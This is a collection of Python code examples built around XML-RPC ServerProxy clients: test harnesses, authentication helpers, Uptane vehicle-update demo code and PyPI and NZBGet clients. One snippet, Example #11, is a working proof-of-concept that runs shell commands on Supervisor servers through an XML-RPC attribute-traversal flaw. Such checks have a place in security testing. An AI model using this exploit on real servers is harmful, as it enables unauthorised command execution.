Example #1
    def setUpClass(self):
        shutil.rmtree('./data/tests', ignore_errors=True)
        os.makedirs('./data/tests')

        def get_taskdb():
            return taskdb.TaskDB(self.taskdb_path)

        self.taskdb = get_taskdb()

        def get_projectdb():
            return projectdb.ProjectDB(self.projectdb_path)

        self.projectdb = get_projectdb()

        def get_resultdb():
            return resultdb.ResultDB(self.resultdb_path)

        self.resultdb = get_resultdb()

        self.newtask_queue = Queue(10)
        self.status_queue = Queue(10)
        self.scheduler2fetcher = Queue(10)
        self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' %
                                             self.scheduler_xmlrpc_port)

        def run_scheduler():
            scheduler = Scheduler(taskdb=get_taskdb(),
                                  projectdb=get_projectdb(),
                                  newtask_queue=self.newtask_queue,
                                  status_queue=self.status_queue,
                                  out_queue=self.scheduler2fetcher,
                                  data_path="./data/tests/",
                                  resultdb=get_resultdb())
            scheduler.UPDATE_PROJECT_INTERVAL = 0.1
            scheduler.LOOP_INTERVAL = 0.1
            scheduler.INQUEUE_LIMIT = 10
            Scheduler.DELETE_TIME = 0
            scheduler._last_tick = int(time.time())  # don't dispatch cronjobs immediately
            run_in_thread(scheduler.xmlrpc_run,
                          port=self.scheduler_xmlrpc_port)
            scheduler.run()

        self.process = run_in_thread(run_scheduler)
        time.sleep(1)
Example #2
    def _xml_rpc_auth(self):
        """
        Authenticates with the server using XML-RPC and returns the cookie's
        name and ID.
        """
        # TODO: This method should be replaced with SafeCookieTransfer class!!!
        import re
        import ssl
        import tempfile
        import six.moves.xmlrpc_client as xmlrpclib

        try:
            ssl_context = ssl.create_default_context(cafile=self.ca_cert)
            transport = xmlrpclib.SafeTransport(context=ssl_context)
        except TypeError:
            # py < 2.7.9
            transport = xmlrpclib.SafeTransport()


        hub = xmlrpclib.ServerProxy(
            urljoin(self.base_url, 'client'),
            allow_none=True,
            transport=transport,
            verbose=True)

        stdout = sys.stdout
        tmp_file = tempfile.TemporaryFile(mode='w+')  # text mode so the str regex below matches
        try:
            sys.stdout = tmp_file
            hub.auth.login_password(self.auth.username, self.auth.password)
            tmp_file.seek(0)
            stdout_content = tmp_file.read()
        except xmlrpclib.Fault:
            raise RuntimeError('Failed to authenticate with the server')
        finally:
            sys.stdout = stdout
            tmp_file.close()

        pattern = re.compile(r'beaker_auth_token=[\w.-]*')
        results = pattern.findall(stdout_content)
        if not results:
            raise RuntimeError("Cookie not found")

        return {'beaker_auth_token': results[0].split('=')[1]}
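A note on the TODO above: one way to keep the session cookie without scraping the verbose output is a cookie-aware transport. The sketch below is only an illustration, written against Python 3's xmlrpc.client Transport hooks (send_headers/parse_response, which Python 2's xmlrpclib lacks); the class name is invented here and is not part of this project.

# Sketch only: remember Set-Cookie headers and replay them on later requests.
# Relies on Python 3's Transport.send_headers()/parse_response() hooks.
import six.moves.xmlrpc_client as xmlrpclib

class CookieSafeTransport(xmlrpclib.SafeTransport):
    def __init__(self, *args, **kwargs):
        xmlrpclib.SafeTransport.__init__(self, *args, **kwargs)
        self._cookies = []

    def send_headers(self, connection, headers):
        # Attach any cookies collected from earlier responses.
        if self._cookies:
            connection.putheader('Cookie', '; '.join(self._cookies))
        xmlrpclib.SafeTransport.send_headers(self, connection, headers)

    def parse_response(self, response):
        # Collect cookies set by the server (e.g. beaker_auth_token).
        for header in response.msg.get_all('Set-Cookie') or []:
            self._cookies.append(header.split(';', 1)[0])
        return xmlrpclib.SafeTransport.parse_response(self, response)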
Example #3
def register_self_with_director():
    """
  Send the Director a message to register our ECU serial number and Public Key.
  In practice, this would probably be done out of band, when the ECU is put
  into the vehicle during assembly, not through the Secondary or Primary
  themselves.
  """
    # Connect to the Director
    server = xmlrpc_client.ServerProxy('http://' +
                                       str(demo.DIRECTOR_SERVER_HOST) + ':' +
                                       str(demo.DIRECTOR_SERVER_PORT))

    print('Registering Secondary ECU Serial and Key with Director.')
    server.register_ecu_serial(
        secondary_ecu.ecu_serial,
        uptane.common.public_key_from_canonical(secondary_ecu.ecu_key), _vin,
        False)
    print(GREEN + 'Secondary has been registered with the Director.' +
          ENDCOLORS)
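For context, the Director endpoint that register_ecu_serial() calls is not part of this snippet. Below is a minimal sketch of what such an endpoint could look like, using six's SimpleXMLRPCServer alias; the port and the handler body are illustrative only, not the uptane demo's actual Director code.

# Hypothetical receiving side of register_ecu_serial(); illustrative only.
from six.moves.xmlrpc_server import SimpleXMLRPCServer

def register_ecu_serial(ecu_serial, ecu_public_key, vin, is_primary):
    # A real Director would validate the key and persist the registration.
    print('Registered ECU %s for VIN %s (primary=%s)' % (ecu_serial, vin, is_primary))
    return True

server = SimpleXMLRPCServer(('localhost', 8000), allow_none=True)
server.register_function(register_ecu_serial)
server.serve_forever()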
Example #4
    def __init__(self, url):
        if url.startswith('https://'):
            self._transport = GSSAPITransport()
        elif url.startswith('http://'):
            raise NitrateError(
                "Encrypted https communication required for "
                "GSSAPI authentication.\nURL provided: {0}".format(url))
        else:
            raise NitrateError("Unrecognized URL scheme: {0}".format(url))

        self._transport.cookiejar = CookieJar()
        # print("COOKIES:", self._transport.cookiejar._cookies)
        self.server = xmlrpclib.ServerProxy(url,
                                            transport=self._transport,
                                            verbose=VERBOSE,
                                            allow_none=1)

        # Login, get a cookie into our cookie jar:
        login_dict = self.do_command("Auth.login_krbv", [])
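do_command() is referenced above but not included in this snippet. A rough sketch of what such a dispatcher can look like, relying on the fact that ServerProxy resolves dotted method names passed to getattr() (the same trick used by the supervisor PoC in Example #11); this is an assumption, not the project's actual implementation.

    # Hypothetical sketch of the do_command() helper used above.
    def do_command(self, verb, args):
        # ServerProxy turns a dotted name such as "Auth.login_krbv" into an
        # XML-RPC call for that method on the server.
        return getattr(self.server, verb)(*args)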
Example #5
    def _init_supervisor_rpc(self, rpc_or_port):
        '''Initialize supervisor RPC.

        Allow passing in an RPC connection, or a port number for
        making one.

        '''
        if isinstance(rpc_or_port, int):
            if self.username:
                leader = 'http://{self.username}:{self.password}@'
            else:
                leader = 'http://'
            tmpl = leader + '{self.name}:{port}'
            url = tmpl.format(self=self, port=rpc_or_port)
            self.rpc = xmlrpc_client.ServerProxy(url,
                                                 transport=TimeoutTransport())
        else:
            self.rpc = rpc_or_port
        self.supervisor = self.rpc.supervisor
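A minimal usage sketch for the proxy built above, assuming a supervisord instance listening on the standard inet_http_server endpoint; the host and port are illustrative, not taken from the class.

# Illustrative usage; supervisor.getState() and getAllProcessInfo() are
# standard supervisord XML-RPC methods.
from six.moves import xmlrpc_client

rpc = xmlrpc_client.ServerProxy('http://localhost:9001/RPC2')
print(rpc.supervisor.getState())  # e.g. {'statecode': 1, 'statename': 'RUNNING'}
for proc in rpc.supervisor.getAllProcessInfo():
    print(proc['name'], proc['statename'])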
Example #6
def register_self_with_primary():
  """
  Send the Primary a message to register our ECU serial number.
  In practice, this would probably be done out of band, when the ECU is put
  into the vehicle during assembly, not by the Secondary itself.
  """

  I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[register_self_with_primary()]: ' + ENDCOLORS
  #TODO: Print to be deleted
  print(str('%s %s %s' % (I_TO_PRINT, 'Send the Primary a message to register our ECU serial number', secondary_ecu.ecu_serial)))
  #TODO: Until here

  # Connect to the Primary
  server = xmlrpc_client.ServerProxy(
    'http://' + str(_primary_host) + ':' + str(_primary_port))

  print('Registering Secondary ECU Serial and Key with Primary.')
  server.register_new_secondary(secondary_ecu.ecu_serial)
  print(GREEN + 'Secondary has been registered with the Primary.' + ENDCOLORS)
Example #7
def submit_vehicle_manifest_to_director(signed_vehicle_manifest=None):

    global most_recent_signed_vehicle_manifest

    I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[submit_vehicle_manifest_to_director()]: ' + uptane.ENDCOLORS

    if signed_vehicle_manifest is None:
        signed_vehicle_manifest = most_recent_signed_vehicle_manifest

    if tuf.conf.METADATA_FORMAT == 'der':
        # If we're working with DER ECU Manifests, check that the manifest to send
        # is a byte array, and encapsulate it in a Binary() object for XMLRPC
        # transmission.
        uptane.formats.DER_DATA_SCHEMA.check_match(signed_vehicle_manifest)
        signed_vehicle_manifest = xmlrpc_client.Binary(signed_vehicle_manifest)

    else:
        uptane.formats.SIGNABLE_VEHICLE_VERSION_MANIFEST_SCHEMA.check_match(
            signed_vehicle_manifest)

    server = xmlrpc_client.ServerProxy('http://' +
                                       str(demo.DIRECTOR_SERVER_HOST) + ':' +
                                       str(demo.DIRECTOR_SERVER_PORT))

    #TODO: Print to be deleted
    print(
        str('%s %s %s %s %s %s %s' % (
            I_TO_PRINT,
            'Connection already done. Submitting vehicle manifest to director with primary_ecu.vin:',
            primary_ecu.vin, 'primary_ecu.ecu_serial:', primary_ecu.ecu_serial,
            'signed_vehicle_manifest:', '?')))
    #TODO: Until here

    print("Submitting the Primary's manifest to the Director.")

    server.submit_vehicle_manifest(primary_ecu.vin, primary_ecu.ecu_serial,
                                   signed_vehicle_manifest)

    print(GREEN + 'Submission of Vehicle Manifest complete.' + ENDCOLORS)

    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Returning...')))
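On the receiving end, a payload sent as xmlrpc_client.Binary arrives as a Binary instance whose raw bytes are exposed through its .data attribute (the same convention used by the Secondary in Example #24 below). A hedged sketch of how a Director-side handler might unwrap it; the handler body is illustrative, not the actual Director implementation.

# Illustrative sketch of the receiving side only.
from six.moves import xmlrpc_client

def submit_vehicle_manifest(vin, ecu_serial, signed_vehicle_manifest):
    if isinstance(signed_vehicle_manifest, xmlrpc_client.Binary):
        # DER manifests travel as Binary; the raw bytes live in .data.
        signed_vehicle_manifest = signed_vehicle_manifest.data
    # ... validate the signature and register the manifest here ...
    return True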
Example #8
    def _login(self, force=False, verbose=False):
        """Login to the hub.
        - self._hub instance is created in this method
        - session information is stored in a cookie in self._transport
        """

        login_method_name = "_login_%s" % self._auth_method
        if not hasattr(self, login_method_name):
            raise ImproperlyConfigured("Unknown authentication method: %s" %
                                       self._auth_method)

        # create new self._hub instance (only once, when calling constructor)
        if self._hub is None:
            self._hub = xmlrpclib.ServerProxy(
                "%s/%s/" % (self._hub_url, self._client_type),
                allow_none=True,
                transport=self._transport,
                verbose=verbose)

        if force or self._hub.auth.renew_session():
            self._logger and self._logger.info("Creating new session...")
            try:
                # logout to delete current session information
                self._logout()
            except KeyboardInterrupt:
                raise
            except Exception as ex:
                self._logger and self._logger.error(
                    "Failed to log out: %s" % ex)

            try:
                login_method = getattr(self, login_method_name)
                login_method()
                self._logged_in = True
            except KeyboardInterrupt:
                raise
            except Exception as ex:
                self._logger and self._logger.debug(
                    "Failed to create new session: %s" % ex)
            else:
                self._logger and self._logger.info("New session created.")
Example #9
def submit_ecu_manifest_to_primary(signed_ecu_manifest=None):

  I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[submit_ecu_manifest_to_primary(signed_ecu_manifest)]: ' + uptane.ENDCOLORS
  #TODO: Print to be deleted
  print(str('%s %s %s' % (I_TO_PRINT, 'Submitting ECU manifest to primary. signed_ecu_manifest:', signed_ecu_manifest)))
  #TODO: Until here

  global most_recent_signed_ecu_manifest
  if signed_ecu_manifest is None:
    signed_ecu_manifest = most_recent_signed_ecu_manifest


  if tuf.conf.METADATA_FORMAT == 'der':
    # TODO: Consider validation of DER manifests as well here. (Harder)

    # If we're using ASN.1/DER data, then we have to transmit this slightly
    # differently via XMLRPC, wrapped in a Binary object.
    signed_ecu_manifest = xmlrpc_client.Binary(signed_ecu_manifest)

  else:
    # Otherwise, we're working with standard Python dictionary data as
    # specified in uptane.formats. Validate and keep as-is.
    uptane.formats.SIGNABLE_ECU_VERSION_MANIFEST_SCHEMA.check_match(
        signed_ecu_manifest)


  server = xmlrpc_client.ServerProxy(
      'http://' + str(_primary_host) + ':' + str(_primary_port))
  #if not server.system.listMethods():
  #  raise Exception('Unable to connect to server.')

  server.submit_ecu_manifest(
      secondary_ecu.vin,
      secondary_ecu.ecu_serial,
      secondary_ecu.nonce_next,
      signed_ecu_manifest)

  # We don't switch to a new nonce for next time yet. That only happens when a
  # time attestation using that nonce is validated.
  # "Nonces" may be sent multiple times, but only validated once.
  secondary_ecu.set_nonce_as_sent()
Example #10
    def __init__(self, username, password, url, use_mod_auth_kerb=False):
        if url.startswith('https://'):
            self._transport = SafeCookieTransport()
        elif url.startswith('http://'):
            self._transport = CookieTransport()
        else:
            raise NitrateError("Unrecognized URL scheme")

        self._transport.cookiejar = CookieJar()
        # print("COOKIES:", self._transport.cookiejar._cookies)
        self.server = xmlrpclib.ServerProxy(url,
                                            transport=self._transport,
                                            verbose=VERBOSE,
                                            allow_none=1)

        # Login, get a cookie into our cookie jar:
        login_dict = self.do_command(
            "Auth.login", [dict(
                username=username,
                password=password,
            )])
Example #11
def poc(url):
    url = url if '://' in url else 'http://' + url
    # Note: str.rstrip() strips a set of characters, not a suffix, so remove a
    # trailing '/index.php' explicitly instead of rstrip('/index.php').
    url = url.split('#')[0].split('?')[0].rstrip('/')
    if url.endswith('/index.php'):
        url = url[:-len('/index.php')]

    command = "echo rivirsir"
    try:
        proxy = xmlrpc_client.ServerProxy(url + "/RPC2")
        old = getattr(proxy, 'supervisor.readLog')(0, 0)
        logfile = getattr(proxy,
                          'supervisor.supervisord.options.logfile.strip')()
        getattr(proxy,
                'supervisor.supervisord.options.warnings.linecache.os.system')(
                    '{} | tee -a {}'.format(command, logfile))
        result = getattr(proxy, 'supervisor.readLog')(0, 0)
        if result[len(old):].startswith("rivirsir"):
            return True
        else:
            return False
    except Exception:
        return False
Example #12
    def __init__(self, opts, **kwargs):
        super(OpenNebulaBaseProvider, self).__init__(opts, **kwargs)

        self.on_auth = opts.on_auth
        self.on_rpcxml_endpoint = opts.on_rpcxml_endpoint
        self.all_images = opts.all_images

        if not self.on_auth:
            msg = ("ERROR, You must provide a on_auth "
                   "via either --on-auth or env[ON_AUTH]")
            raise exceptions.OpenNebulaProviderException(msg)

        if not self.on_rpcxml_endpoint:
            msg = ("You must provide an OpenNebula RPC-XML "
                   "endpoint via either --on-rpcxml-endpoint or"
                   " env[ON_RPCXML_ENDPOINT]")
            raise exceptions.OpenNebulaProviderException(msg)

        self.static = static.StaticProvider(opts)
        self.xml_parser = defusedxml.ElementTree
        self.server_proxy = xmlrpclib.ServerProxy(self.on_rpcxml_endpoint)
Example #13
def register_self_with_director():
    """
  Send the Director a message to register our ECU serial number and Public Key.
  """

    I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[register_self_with_director()]: ' + uptane.ENDCOLORS
    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Registering self with director')))
    #TODO: Until here

    #TODO: Print to be deleted
    print(
        str('%s %s %s %s %s %s %s' %
            (I_TO_PRINT, 'Connecting to the Director at port:',
             demo.DIRECTOR_SERVER_PORT, 'via http. Sending: ecu_serial:',
             primary_ecu.ecu_serial, 'public_key from canonical and vin:',
             _vin)))
    #TODO: Until here

    # Connect to the Director
    server = xmlrpc_client.ServerProxy('http://' +
                                       str(demo.DIRECTOR_SERVER_HOST) + ':' +
                                       str(demo.DIRECTOR_SERVER_PORT))

    #TODO: Print to be deleted
    print(
        str('%s %s' %
            (I_TO_PRINT, 'Connection already done. Sending information...')))
    #TODO: Until here

    print('Registering Primary ECU Serial and Key with Director.')
    server.register_ecu_serial(
        primary_ecu.ecu_serial,
        uptane.common.public_key_from_canonical(primary_ecu.primary_key), _vin,
        True)
    print(GREEN + 'Primary has been registered with the Director.' + ENDCOLORS)

    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Returning...')))
Example #14
    def setUpClass(self):
        self.inqueue = Queue(10)
        self.outqueue = Queue(10)
        self.fetcher = Fetcher(self.inqueue, self.outqueue)
        self.fetcher.phantomjs_proxy = '127.0.0.1:25555'
        self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % 24444)
        self.xmlrpc_thread = utils.run_in_thread(self.fetcher.xmlrpc_run,
                                                 port=24444)
        self.httpbin_thread = utils.run_in_subprocess(httpbin.app.run,
                                                      port=14887)
        self.httpbin = 'http://127.0.0.1:14887'
        self.thread = utils.run_in_thread(self.fetcher.run)
        try:
            self.phantomjs = subprocess.Popen([
                'phantomjs',
                os.path.join(os.path.dirname(__file__),
                             '../pyspider/fetcher/phantomjs_fetcher.js'),
                '25555'
            ])
        except OSError:
            self.phantomjs = None
        time.sleep(0.5)
Example #15
    def __init__(self, opts):
        super(OpenNebulaBaseProvider, self).__init__(opts)

        self.opts = opts
        self.on_auth = opts.on_auth
        self.on_rpcxml_endpoint = opts.on_rpcxml_endpoint
        self.cloudkeeper_images = opts.cloudkeeper_images

        if not self.on_auth:
            msg = ('ERROR, You must provide a on_auth '
                   'via either --on-auth or env[ON_AUTH]')
            raise exceptions.OpenNebulaProviderException(msg)

        if not self.on_rpcxml_endpoint:
            msg = ('You must provide an OpenNebula RPC-XML '
                   'endpoint via either --on-rpcxml-endpoint or'
                   ' env[ON_RPCXML_ENDPOINT]')
            raise exceptions.OpenNebulaProviderException(msg)

        self.static = providers.static.StaticProvider(opts)
        self.xml_parser = defusedxml.ElementTree
        self.server_proxy = xmlrpclib.ServerProxy(self.on_rpcxml_endpoint)
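A hedged sketch of how the resulting server_proxy is typically used: OpenNebula XML-RPC methods take the auth string first and return a list whose first element is a success flag and whose second is an XML body (or an error string). The one.imagepool.info call and its -2/-1/-1 arguments ("all images, no id range") are assumptions based on the standard OpenNebula API, not code from this provider.

# Assumed usage of the standard OpenNebula XML-RPC API; verify the method
# signature against your OpenNebula version. `provider` is an instance of the
# class above.
response = provider.server_proxy.one.imagepool.info(provider.on_auth, -2, -1, -1)
success, body = response[0], response[1]
if success:
    images_xml = provider.xml_parser.fromstring(body)  # defusedxml Element
else:
    raise exceptions.OpenNebulaProviderException(body)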
Example #16
    def __init__(self, server, username, password, timeout=120):
        """
        Initializes a new Confluence XML RPC API client instance.

        :param server: URL of the Confluence server.
        :param username: username to use for authentication.
        :param password: password to use for authentication.

        Usage:

            >>> from confluence import Confluence
            >>>
            >>> conf = Confluence("http://localhost:8080", "admin", "admin")
            >>> conf.store_page_content("test", "test", "hello world!")

        """
        super(Confluence, self).__init__()
        # without this there is no timeout, and this may block the requests
        socket.setdefaulttimeout(timeout)

        self._server = xmlrpclib.ServerProxy(
            server + '/rpc/xmlrpc', allow_none=True)

        for version in "confluence2", "confluence1":
            try:
                self._token = getattr(self._server, version).login(
                    username, password)
                self.info("Logged in via \"%s\" as \"%s\"", version, username)
                self._version = version
                self._api = getattr(self._server, version)
                break
            except xmlrpclib.Error as e:
                self.debug("Failed \"%s\" login: %s", version, e)
        else:
            raise ValueError(
                "Could not login to %s as %s" % (server, username))
Example #17
    def search(self, query):
        pypi = xmlrpc_client.ServerProxy(INDEX_URL)
        hits = pypi.search({'name': query, 'summary': query}, 'or')
        return hits
Example #18
def get_latest_version():
    from six.moves import xmlrpc_client
    proxy = xmlrpc_client.ServerProxy('http://pypi.python.org/pypi')
    return proxy.package_releases('tendenci')[0]
Example #19
import os
import pickle
import urllib
from six.moves.urllib.request import urlretrieve
from six.moves import filter
from six.moves import xmlrpc_client
import jinja2
import warnings
warnings.simplefilter('always', DeprecationWarning)

from metaextract import utils as meta_utils

import py2pack.proxy
import py2pack.requires
import py2pack.utils
from py2pack import version as py2pack_version

pypi = xmlrpc_client.ServerProxy('https://pypi.python.org/pypi')

SPDX_LICENSES_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                  'spdx_license_map.p')
SDPX_LICENSES = pickle.load(open(SPDX_LICENSES_FILE, 'rb'))


def _get_template_dirs():
    """existing directories where to search for jinja2 templates. The order
    is important. The first found template from the first found dir wins!"""
    return filter(
        lambda x: os.path.exists(x),
        [
            # user dir
            os.path.join(os.path.expanduser('~'), '.py2pack', 'templates'),
            # system wide dir
Example #20
#!/usr/bin/python
import sys

import six
import six.moves.xmlrpc_client as xmlrpclib

if len(sys.argv) > 1:
    filename = sys.argv[1]
    with open(filename, 'rb') as f:
        text = f.read()
else:
    filename = 'stdin'
    text = sys.stdin.read()

s = xmlrpclib.ServerProxy('http://paste.openstack.org/xmlrpc/',
                          allow_none=True)
id = s.pastes.newPaste(None, text, None, filename)

print('http://paste.openstack.org/show/%s/' % id)
Example #21
def sendNZB(nzb, proper=False):  # pylint: disable=too-many-locals, too-many-statements, too-many-branches, too-many-return-statements
    '''
    Sends NZB to NZBGet client

    :param nzb: nzb object
    :param proper: True if this is a Proper download, False if not. Defaults to False
    '''
    if sickbeard.NZBGET_HOST is None:
        logger.log(
            'No NZBget host found in configuration. Please configure it.',
            logger.WARNING)
        return False

    addToTop = False
    nzbgetprio = 0
    category = sickbeard.NZBGET_CATEGORY
    if nzb.show.is_anime:
        category = sickbeard.NZBGET_CATEGORY_ANIME

    url = 'http{0}://{1}:{2}@{3}/xmlrpc'.format(
        's' if sickbeard.NZBGET_USE_HTTPS else '', sickbeard.NZBGET_USERNAME,
        sickbeard.NZBGET_PASSWORD, sickbeard.NZBGET_HOST)

    nzbGetRPC = xmlrpc_client.ServerProxy(url)
    try:
        if nzbGetRPC.writelog(
                'INFO',
                'SickRage connected to drop off {0} any moment now.'.format(
                    nzb.name + '.nzb')):
            logger.log('Successfully connected to NZBget', logger.DEBUG)
        else:
            logger.log(
                'Successfully connected to NZBget, but unable to send a message',
                logger.WARNING)

    except http_client.socket.error:
        logger.log(
            'Please check your NZBget host and port (if it is running). NZBget is not responding to this combination',
            logger.WARNING)
        return False

    except xmlrpc_client.ProtocolError as e:
        if e.errmsg == 'Unauthorized':
            logger.log('NZBget username or password is incorrect.',
                       logger.WARNING)
        else:
            logger.log('Protocol Error: ' + e.errmsg, logger.ERROR)
        return False

    dupekey = ''
    dupescore = 0
    # if it aired recently make it high priority and generate DupeKey/Score
    for curEp in nzb.episodes:
        if dupekey == '':
            if curEp.show.indexer == 1:
                dupekey = 'SickRage-' + str(curEp.show.indexerid)
            elif curEp.show.indexer == 2:
                dupekey = 'SickRage-tvr' + str(curEp.show.indexerid)
        dupekey += '-' + str(curEp.season) + '.' + str(curEp.episode)
        if datetime.date.today() - curEp.airdate <= datetime.timedelta(days=7):
            addToTop = True
            nzbgetprio = sickbeard.NZBGET_PRIORITY
        else:
            category = sickbeard.NZBGET_CATEGORY_BACKLOG
            if nzb.show.is_anime:
                category = sickbeard.NZBGET_CATEGORY_ANIME_BACKLOG

    if nzb.quality != Quality.UNKNOWN:
        dupescore = nzb.quality * 100
    if proper:
        dupescore += 10

    nzbcontent64 = None
    if nzb.resultType == 'nzbdata':
        data = nzb.extraInfo[0]
        nzbcontent64 = standard_b64encode(data)

    logger.log('Sending NZB to NZBget')
    logger.log('URL: ' + url, logger.DEBUG)

    try:
        # Find out if nzbget supports priority (Version 9.0+), old versions beginning with a 0.x will use the old command
        nzbget_version_str = nzbGetRPC.version()
        nzbget_version = try_int(
            nzbget_version_str[:nzbget_version_str.find('.')])
        if nzbget_version == 0:
            if nzbcontent64:
                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 addToTop, nzbcontent64)
            else:
                if nzb.resultType == 'nzb':
                    if not nzb.provider.login():
                        return False

                    data = nzb.provider.get_url(nzb.url, returns='content')
                    if data is None:
                        return False

                    nzbcontent64 = standard_b64encode(data)

                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 addToTop, nzbcontent64)
        elif nzbget_version == 12:
            if nzbcontent64 is not None:
                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 nzbgetprio, False,
                                                 nzbcontent64, False, dupekey,
                                                 dupescore, 'score')
            else:
                nzbget_result = nzbGetRPC.appendurl(nzb.name + '.nzb',
                                                    category, nzbgetprio,
                                                    False, nzb.url, False,
                                                    dupekey, dupescore,
                                                    'score')
        # v13+ has a new combined append method that accepts both (url and content)
        # also the return value has changed from boolean to integer
        # (Positive number representing NZBID of the queue item. 0 and negative numbers represent error codes.)
        elif nzbget_version >= 13:
            nzbget_result = nzbGetRPC.append(
                nzb.name + '.nzb', nzbcontent64
                if nzbcontent64 is not None else nzb.url, category, nzbgetprio,
                False, False, dupekey, dupescore, 'score') > 0
        else:
            if nzbcontent64 is not None:
                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 nzbgetprio, False,
                                                 nzbcontent64)
            else:
                nzbget_result = nzbGetRPC.appendurl(nzb.name + '.nzb',
                                                    category, nzbgetprio,
                                                    False, nzb.url)

        if nzbget_result:
            logger.log('NZB sent to NZBget successfully', logger.DEBUG)
            return True
        else:
            logger.log(
                'NZBget could not add {0} to the queue'.format(nzb.name +
                                                               '.nzb'),
                logger.WARNING)
            return False
    except Exception:
        logger.log(
            'Connect Error to NZBget: could not add {0} to the queue'.format(
                nzb.name + '.nzb'), logger.WARNING)
        return False
Example #22
    def _get_current_version_pip(self):
        client = xmlrpclib.ServerProxy('http://pypi.python.org/pypi')
        v = client.package_releases(self.uri)
        if v:
            return v[0]
Example #23
def pypi_backend(release_name):
    """Actual PyPI backend. Uses an XMLRPC client to fetch release info"""
    pypi = xmlrpc_client.ServerProxy(PYPI_URL)
    return pypi.package_releases(release_name)[0]
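package_releases() returns a (possibly empty) list of version strings, so the [0] above raises IndexError for an unknown project. A defensive variant, as a sketch (the function name is invented here):

def pypi_backend_safe(release_name):
    """Like pypi_backend(), but returns None when the project has no releases."""
    releases = xmlrpc_client.ServerProxy(PYPI_URL).package_releases(release_name)
    return releases[0] if releases else None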
Example #24
def update_cycle():
    """
  Updates our metadata and images from the Primary. Raises the appropriate
  tuf and uptane errors if metadata or the image don't validate.
  """

    global secondary_ecu
    global current_firmware_fileinfo
    global attacks_detected

    # Connect to the Primary
    pserver = xmlrpc_client.ServerProxy('http://' + str(_primary_host) + ':' +
                                        str(_primary_port))

    # Download the time attestation from the Primary.
    time_attestation = pserver.get_time_attestation_for_ecu(_ecu_serial)
    if tuf.conf.METADATA_FORMAT == 'der':
        # Binary data transferred via XMLRPC has to be wrapped in an xmlrpc Binary
        # object. The data itself is contained in attribute 'data'.
        # When running the demo using ASN.1/DER mode, metadata is in binary, and
        # so this xmlrpc Binary object is used and the data should be extracted
        # from it like so:
        time_attestation = time_attestation.data

    # Download the metadata from the Primary in the form of an archive. This
    # returns the binary data that we need to write to file.
    metadata_archive = pserver.get_metadata(secondary_ecu.ecu_serial)

    # Validate the time attestation and internalize the time. Continue
    # regardless.
    try:
        secondary_ecu.validate_time_attestation(time_attestation)
    except uptane.BadTimeAttestation as e:
        print(
            "Timeserver attestation from Primary does not check out: "
            "This Secondary's nonce was not found. Not updating this Secondary's "
            "time this cycle.")
    except tuf.BadSignatureError as e:
        print(RED +
              "Timeserver attestation from Primary did not check out. Bad "
              "signature. Not updating this Secondary's time." + ENDCOLORS)
        attacks_detected += 'Timeserver attestation had bad signature.\n'

    #else:
    #  print(GREEN + 'Official time has been updated successfully.' + ENDCOLORS)

    # Dump the archive file to disk.
    archive_fname = os.path.join(secondary_ecu.full_client_dir,
                                 'metadata_archive.zip')

    with open(archive_fname, 'wb') as fobj:
        fobj.write(metadata_archive.data)

    # Now tell the Secondary reference implementation code where the archive file
    # is and let it expand and validate the metadata.
    secondary_ecu.process_metadata(archive_fname)

    # As part of the process_metadata call, the secondary will have saved
    # validated target info for targets intended for it in
    # secondary_ecu.validated_targets_for_this_ecu.

    # For now, expect no more than 1 target for an ECU. I suspect that the
    # reference implementation will eventually support more. For now, I've kept
    # things flexible in a number of parts of the reference implementation, in
    # this regard. The demo, though, doesn't have use for that tentative
    # flexibility.

    if len(secondary_ecu.validated_targets_for_this_ecu) == 0:
        print_banner(
            BANNER_NO_UPDATE,
            color=WHITE + BLACK_BG,
            text='No validated targets were found. Either the Director '
            'did not instruct this ECU to install anything, or the target info '
            'the Director provided could not be validated.')
        # print(YELLOW + 'No validated targets were found. Either the Director '
        #     'did not instruct this ECU to install anything, or the target info '
        #     'the Director provided could not be validated.' + ENDCOLORS)
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    #elif len(secondary_ecu.validated_targets_for_this_ecu) > 1:
    #  assert False, 'Multiple targets for an ECU not supported in this demo.'

    expected_target_info = secondary_ecu.validated_targets_for_this_ecu[-1]

    expected_image_fname = expected_target_info['filepath']
    if expected_image_fname[0] == '/':
        expected_image_fname = expected_image_fname[1:]

    # Since metadata validation worked out, check if the Primary says we have an
    # image to download and then download it.
    # TODO: <~> Cross-check this: we have the metadata now, so we and the Primary
    # should agree on whether or not there is an image to download.
    if not pserver.update_exists_for_ecu(secondary_ecu.ecu_serial):

        print_banner(
            BANNER_NO_UPDATE,
            color=WHITE + BLACK_BG,
            text='Primary reports that there is no update for this ECU.')
        # print(YELLOW + 'Primary reports that there is no update for this ECU.')
        (image_fname, image) = pserver.get_image(secondary_ecu.ecu_serial)
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    # Download the image for this ECU from the Primary.
    (image_fname, image) = pserver.get_image(secondary_ecu.ecu_serial)

    if image is None:
        print(YELLOW +
              'Requested image from Primary but received none. Update '
              'terminated.' + ENDCOLORS)
        attacks_detected += 'Requested image from Primary but received none.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    elif not secondary_ecu.validated_targets_for_this_ecu:
        print(
            RED + 'Requested and received image from Primary, but metadata '
            'indicates no valid targets from the Director intended for this ECU. '
            'Update terminated.' + ENDCOLORS)
        # TODO: Determine if something should be added to attacks_detected here.
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    elif image_fname != expected_image_fname:
        # Make sure that the image name provided by the Primary actually matches
        # the name of a validated target for this ECU, otherwise we don't need it.
        print(
            RED + 'Requested and received image from Primary, but this '
            'Secondary has not validated any target info that matches the given '
            + 'filename. Expected: ' + repr(expected_image_fname) +
